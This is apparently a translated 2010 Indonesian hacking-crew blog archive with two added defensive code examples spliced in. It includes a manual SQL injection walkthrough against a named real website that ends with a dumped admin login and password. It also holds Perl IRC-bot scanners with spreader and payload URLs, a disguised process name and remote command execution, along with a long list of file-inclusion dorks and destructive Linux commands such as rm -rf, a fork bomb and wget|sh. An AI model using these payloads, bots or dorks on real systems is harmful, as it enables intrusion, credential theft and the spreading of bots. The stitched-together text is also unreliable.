Kill-9 CrEw Indonesia: 2010

Wednesday, December 22, 2010

Manual SQL Injection Tutorial

By : arianom Kill-9 Crew


Target : http://www.natoleo.com/Content.php?id=14

1. Check a website for the bug by appending a single quote ( ' ) to the end of the URL; it turns out http://www.natoleo.com has the bug.

http://www.natoleo.com/Content.php?id=14

The error message appears: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)


2. To find the columns, use the [order by] command. Start with order by 1--, then 2, and so on until an error message appears. On our target this time, the error appears at the number 6: MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.natoleo.com/Content.php?id=14 order by 5--

So the number to take is 6-1 = 5 (the number of columns is 5).


3. Next we look for the "magic number", the position where we can inject, using the [union all select] command. Don't forget to add a minus sign ( - ) in front of the id parameter value, so that id=14 becomes id=-14.

http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--

The "magic number" that appears: 1


4. Next we find the MySQL database version with "version()" in place of the number 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--

The output shown: 5.0.51a-community


5. Next we look for the tables with "group_concat(table_name)" in place of one of the magic numbers and " from information_schema.tables where table_schema=database()--" after the number 5.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--

The table names appear: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome


6. Next we look for the columns of a table related to users and passwords; this time we take the table "members". First we convert the name to hex so that SQL can read it, here: http://undana.ac.id/images/upload/test.html. In the ASCII text field type members, then click encode. The result in the Hex Value field: 6D656D62657273

The next command is "group_concat(column_name)" at magic number 1 and " from information_schema.columns where table_name=0xHexa--" at the end of the URL, where Hexa is 6D656D62657273.

Add 0x in front of the hex value so the server knows it has been converted to hex.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--

The columns appear: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

We take: member_login,member_password


7. To view the contents of these two columns, use "group_concat(column1,0x3a,column2)" at magic number 1 and from NAMATABLE-- at the end of the URL.

Replace column1 with "member_login" and column2 with "member_password". 0x3a is the colon ( : ) converted to hex. Replace NAMATABLE with "members" to retrieve information from the table named "members".

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--

The result will appear:

user: wilmarnatoleo

pass: natoleoP@ssword

Now all that remains is to log in to the target website..

http://www.natoleo.com/admin/

Say No to Malingsial. Good luck, friends..
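
Seen from the server side, the seven steps above leave a recognisable trail in the web access log. The following added example (not part of the original post; the log lines, IP addresses, stage names and verdict labels are constructed for illustration) flags non-integer values of the `id` parameter, labels which step each request matches, and decodes `0x...` literals so an analyst can see which table name was queried.

```python
import re
from collections import OrderedDict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [22/Dec/2010:10:00:01 +0700] "GET /Content.php?id=14 HTTP/1.1" 200 5120
198.51.100.20 - - [22/Dec/2010:10:00:30 +0700] "GET /Content.php?id=14abc HTTP/1.1" 200 640
203.0.113.9 - - [22/Dec/2010:10:01:10 +0700] "GET /Content.php?id=14%27 HTTP/1.1" 200 812
203.0.113.9 - - [22/Dec/2010:10:01:25 +0700] "GET /Content.php?id=14%20order%20by%205-- HTTP/1.1" 200 5120
203.0.113.9 - - [22/Dec/2010:10:01:31 +0700] "GET /Content.php?id=14%20order%20by%206-- HTTP/1.1" 200 640
203.0.113.9 - - [22/Dec/2010:10:02:02 +0700] "GET /Content.php?id=-14%20union%20all%20select%201,2,3,4,5-- HTTP/1.1" 200 5001
203.0.113.9 - - [22/Dec/2010:10:03:40 +0700] "GET /Content.php?id=-14%20union%20all%20select%20group_concat(column_name),2,3,4,5%20from%20information_schema.columns%20where%20table_name=0x6D656D62657273-- HTTP/1.1" 200 5400
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# One pattern per step of the tutorial, in the order the steps are performed.
STAGES = OrderedDict([
    ("quote_probe", re.compile(r"'")),
    ("column_count_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
])

HEX_RE = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")


def classify(value):
    """Return the names of the stages whose pattern appears in a decoded value."""
    return [name for name, rx in STAGES.items() if rx.search(value)]


def decode_hex_literals(value):
    """Decode 0x... literals that are printable ASCII (e.g. a hex-encoded table name)."""
    decoded = []
    for match in HEX_RE.finditer(value):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def scan(log_text, numeric_params=("id",)):
    """Group suspicious requests by client IP.

    A parameter listed in numeric_params is expected to be a plain integer;
    any other value is counted as a hit and matched against STAGES.
    """
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key not in numeric_params or re.fullmatch(r"\d+", value):
                continue  # not monitored, or a well-formed integer
            entry = findings.setdefault(
                m["ip"], {"stages": [], "decoded": [], "hits": 0}
            )
            entry["hits"] += 1
            for stage in classify(value):
                if stage not in entry["stages"]:
                    entry["stages"].append(stage)
            for text in decode_hex_literals(value):
                if text not in entry["decoded"]:
                    entry["decoded"].append(text)
    return findings


def verdict(entry):
    """Coarse triage label for one client's findings."""
    stages = entry["stages"]
    if "union_select" in stages or "schema_enum" in stages:
        return "exploitation"
    if stages:
        return "probing"
    return "malformed-input"  # non-integer id without any injection pattern


if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, verdict(entry), entry["stages"], entry["decoded"], entry["hits"])
```

A request that reaches `union_select` on a parameter that should be an integer means the query is built by string concatenation; binding `id` as an integer parameter, or casting it to an integer before use, removes the injection point.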

Wednesday, December 15, 2010

Special BUg SQL Injection


Dork XML


Sunday, December 12, 2010

LFI Dork


Friday, December 10, 2010

Joomla LFI dork


Thursday, November 18, 2010

LFi Scanner v1.0

#!/usr/bin/perl

#######################################
# Apache Conf Scanner v1.0 #
# ReCoded by arianom #
# d00r[at]telkom[dot]net #
# Copyleft © 2009 VopCrew UnderGrounD #
#######################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2Apache-Conf-Scanner 15) ';

my $lficmd = '!conf';
my $alicmd = '!logz';

my $status = 0;
my $null_byte = "";
my $trasversal = "../../../../../../../../../../../../../../../..";
my $lfi_test = "/etc/passwd";
my $lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
my $conf_output = "server configuration file";
my @httpd_conf = qw (
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/etc/apache/httpd.conf
/usr/local/etc/httpd/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/var/www/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
);

Note: Usage is easy, just type perl conf-scan.txt
and the correct usage message will appear in the shell.
Good luck!

Friday, November 12, 2010

e107 New Scanner ByroeNet

#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";


Thursday, November 11, 2010

BaMbY LFI Scanner

#!/usr/bin/perl
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";



Wednesday, November 10, 2010

Havij v1.1: Advanced SQL Injection

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. With this software a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and execute commands on the operating system.

What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.


Tuesday, October 12, 2010

SQLi bug

These are for finding targets whose websites have an SQLi bug


RFI & LFI scanner

***************************
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;

$|++;
#######################################################
## CONFIGURATION //
#######################################################

$auth = "arianom";
$authmail = "arianom\@live.it";

my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick

my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
# in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
# Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
# number, so more speed.
my $rfipidpr0c = 50;


### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode


Monday, February 22, 2010

Hack Mozilla Firefox to Increase Internet Speed

Hacking just keeps getting cooler; all sorts of things can be hacked, from credit cards to the Pentagon's security systems being broken into by hackers. I won't go far into the difficult kinds of hacking here; instead I'll show how to hack Mozilla Firefox to make your internet connection much faster. This tip applies not only to personal computers but can also speed up the internet at an internet cafe. So here are the steps to follow to make your internet faster; remember, the browser used is Mozilla Firefox.

1. Open Mozilla.

2. Type "about:config" (without the quotes) in the address bar.

3. Scroll down and find "network.http.max-connections", double-click it and enter the value "64".

4. Find "network.http.max-connections-per-server", double-click it and enter the value "21".

5. Find "network.http.max-persistent-connections-per-server", double-click it and enter the value "8".

6. Double-click "network.http.pipelining" to set it to "true".

7. Find "network.http.pipelining.maxrequests", double-click it and enter the value "100".

8. Double-click "network.http.proxy.pipelining" to set it to "true".

9. As the last step, right-click anywhere and choose New >> Integer, then type "nglayout.initialpaint.delay" (without the quotes). Then enter the value "0".

Feel the difference right away; your internet will go whoosh, really fast. :-)

I've proven it myself, so good luck trying it, bro

Sunday, February 21, 2010

Deadly Commands in Linux

Linux is known for its security in everyday use. Viruses that get along well with Windows, for example, have to find very complicated ways to penetrate Linux.

Even so, this mortal world (hehehe…) is home to all sorts of people with all sorts of characters. Criminals and psychopaths can disguise themselves on forums and mailing lists and, instead of offering a solution, make you suffer. Sometimes dangerous Linux commands are used as a joke to tease people (although various distros have ethics and guiding principles that forbid dangerous jokes), and some people really do intend to trap others.

Here are 7 dangerous commands, summarized from 7 Deadly Command:

  1. The command rm -rf /
    This command deletes the entire contents of / (the root folder or root directory). The root folder is protected by the root user's permissions, but the command is very dangerous if executed while we hold root privileges. That is why using an ordinary user account for everyday activities is strongly recommended. The command is still dangerous when run by an ordinary user, since it can destroy the contents of that user's own folders.
  2. A command written in hexadecimal
    char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

    The command above is the same as command number 1, only written in hexadecimal. If executed, it amounts to deleting the entire contents of a folder (rm -rf /). Because it is written in hexadecimal, it can trap even experienced Linux users. Note that the readable string at the end of this particular listing is a different command: it copies /bin/sh to /tmp/.beyond and sets mode 4755 (setuid).

  3. The command mkfs.ext3 /dev/sda
    This command amounts to formatting the specified partition.
  4. The fork bomb command :(){:|:&};:
    This command tells the system to keep spawning processes until it hangs. It usually results in data loss because the computer has to be forcibly powered off.
  5. Any command > /dev
    This command overwrites the specified device file and can ultimately cause loss of the data mounted under /dev (the /dev folder is normally used to hold hardware and hard disk entries).
  6. A command that executes a given shell file
    The command wget http://alamat-url-yangtidak-jelas -O- | sh tells Linux to run the referenced sh file directly. An sh file is an executable file on Linux, much like an .exe file. Never run the command above for an sh file whose source and purpose are unclear.
  7. A command that moves the home folder to /dev/null
    mv /home/home-directory/* /dev/null
    This command moves all data in the home folder to the null file (a file that does not really exist). The moved files are lost forever, with no backup…

Besides the 7 commands above, there are several other commands that may not have been included here. Caution when running any command is an absolute principle that Linux users must always keep in mind.
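As an added example (not part of the original post), the POSIX shell function below screens a command line copied from a forum or mailing list against the seven patterns in the list above before it is pasted into a terminal. The label names, the regular expressions, the inclusion of curl next to wget, and the block-device name prefixes are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post: flag a pasted command line
# that matches one of the seven patterns listed above.
# Labels and regexes are this example's own choices (assumptions).

# has PATTERN: true if $cmd matches the extended regular expression.
has() { printf '%s\n' "$cmd" | grep -Eq -e "$1"; }

# classify_cmd 'command line' -> prints matching labels, or "ok".
classify_cmd() {
    cmd=$1
    hits=""

    # 1. rm with both -r and -f aimed at / or ~ (not at a deeper path).
    if has '(^|[^[:alnum:]_])rm[[:space:]]+-[[:alpha:]]*(r[[:alpha:]]*f|f[[:alpha:]]*r)[[:alpha:]]*[[:space:]]+(/|~)(\*|/\*)?([[:space:]]|$)'; then
        hits="$hits recursive-delete"
    fi

    # 2. Eight or more consecutive \xNN escapes: bytes nobody can review by eye.
    if has '(\\x[0-9a-fA-F]{2}){8}'; then
        hits="$hits opaque-bytes"
    fi

    # 3. mkfs (any filesystem type) pointed at something under /dev.
    if has '(^|[^[:alnum:]_])mkfs(\.[[:alnum:]]+)?[[:space:]]+(.*[[:space:]])?/dev/'; then
        hits="$hits format-device"
    fi

    # 4. Fork bomb: a function that pipes into itself in the background.
    #    Whitespace is stripped first so spaced-out variants also match;
    #    the back-reference \1 catches any function name, not only ":".
    if printf '%s' "$cmd" | tr -d '[:space:]' |
        grep -q -e '\([^(){};|&]\{1,\}\)(){\1|\1&};\1'; then
        hits="$hits fork-bomb"
    fi

    # 5. Output redirected onto a block device.
    #    The device name prefixes are an assumption of this example.
    if has '>>?[[:space:]]*/dev/(sd|hd|vd|xvd|nvme|mmcblk)'; then
        hits="$hits overwrite-device"
    fi

    # 6. Download piped straight into a shell (curl added beside wget).
    if has '(wget|curl)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(sh|bash)([[:space:];&|]|$)'; then
        hits="$hits pipe-to-shell"
    fi

    # 7. mv with /dev/null as the destination (a "2> /dev/null" redirect
    #    is not a destination and is ignored).
    if has '(^|[^[:alnum:]_])mv[[:space:]]+.*[^>[:space:]][[:space:]]+/dev/null([[:space:]]|$)'; then
        hits="$hits move-to-null"
    fi

    if [ -z "$hits" ]; then
        echo ok
    else
        echo "${hits# }"
    fi
}

# Constructed sample inputs (example.invalid is a placeholder host).
if [ "${1:-}" = "--demo" ]; then
    classify_cmd 'sudo rm -rf /'
    classify_cmd 'wget http://example.invalid/install.sh -O- | sh'
    classify_cmd 'rm -rf /tmp/build'
fi
```

A match means the line should be read and understood before it is run; "ok" only means none of these seven patterns was found.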

Mixed Bug Dorks

!scan common/func.php?CommonAbsDir= func.php?
!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
!scan /login.php?dir= login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan index.php?pageurl= "index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= "fusion news management system"
!scan index.php?var= "index.php?var=*.php"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?go= "index.php?go="
!scan index.php?site= "index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= ".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?id= "index.php?id=*.php"
!scan index1.php?= "index1.php?=*.php?
!scan index.php?site= "index.php?site=*.php"
!scan main.php?id= "main.php?id=*.php"
!scan content.php?page= "content.php?page=*.php"
!scan admin.php?page= "admin.php?page=*.php"
!scan lib/gore.php?libpath= "/SQuery/"
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan index2.php?p= "index2.php?p=*.php"
!scan index1.php?go= "index1.php?go=*.php"
!scan news_detail.php?file= "news_detail.php?file=*.php"
!scan old_reports.php?file= "old_reports.php?file=*.php"
!scan index.php?x= "index.php?x=*.php"
!scan index.php?nic= "index.php?nic=*.php"
!scan homepage.php?sel= "homepage.php?sel=*.php"
!scan index.php?sel= "index.php?sel=*.php"
!scan main.php?x= "main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "com_artlinks"
!scan index2.php?x= index2.php?x=*.php"
!scan main.php?pagina= "main.php?pagina=*.php"
!scan test.php?page= test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= akocomments.php
!scan index.php?page= "edu/index.php?page=*.php"
!scan *.php?page= *.php?page=*.php"
!scan index.php?oldal= "index.php?oldal=*.php"
!scan index.php?lang=gr&file "index.php?lang=gr&file=*.php"
!scan index.php?pag= "index.php?pag=*.php"
!scan index.php?incl= "index.php?incl="
!scan avatar.php?page= "avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= "edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /xgallery/
!scan index.php?x= "com/index.php?x=*.php"
!scan index.php?mode= "com/index.php?mode=*.php"
!scan index.php?stranica= "index.php?stranica="
!scan index.php?sub= "il/index.php?sub=*.php"
!scan index.php?id= "/index.php?id=*.php"
!scan index.php?t= "/index.php?t=*.php"
!scan index.php?r= "index.php?r=*.php"
!scan index.php?menu= "net/index.php?menu=*.php"
!scan index.php?pag= "com/index.php?pag=*.php"
!scan solpot.html?body= "solpot.html?body"
!scan port.php?content= port.php?content=*.php"
!scan index0.php?show= index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= day.php?date= /day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan content.php?page= "*content.php?page=*.php"
!scan index.php?topic= "/index.php?topic=*.php"
!scan index.php?u= "/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= "com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= ".tr./components"
!scan modules/My_eGallery/index.php?basepath= "My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= "vwar"
!scan index.php?loc= .br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= "us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= "com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan myevent.php?myevent_path= myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= "com_uhp"
!scan myevent.php?myevent_path= "uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" "uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "us/index.php?option=com_remository
!scan show.php?path= fclick
!scan show.php?path= .ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= ".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= "com_a6mambocredits"
!scan index.php?template= "index.php?"
!scan search.php?cutepath= "search.php?"
!scan show_news.php?cutepath= "show_news.php?"
!scan page.php?doc= "page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= "com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= ".de.*/com_mgm"
!scan help.php?css_path= phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= "com_galleria/"
!scan big.php?pathtotemplate= ".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= ".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= ".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= ".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= /squirrelcart/
!scan index2.php?to= "/index2.php?to=*.php"
!scan index.php?load= "/index.php?load=*.php"
!scan home.php?pagina= "home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= modules.php?name=4nAlbum
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= /agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= **/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= **/spid.php **/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= *br*/newbb_plus/*
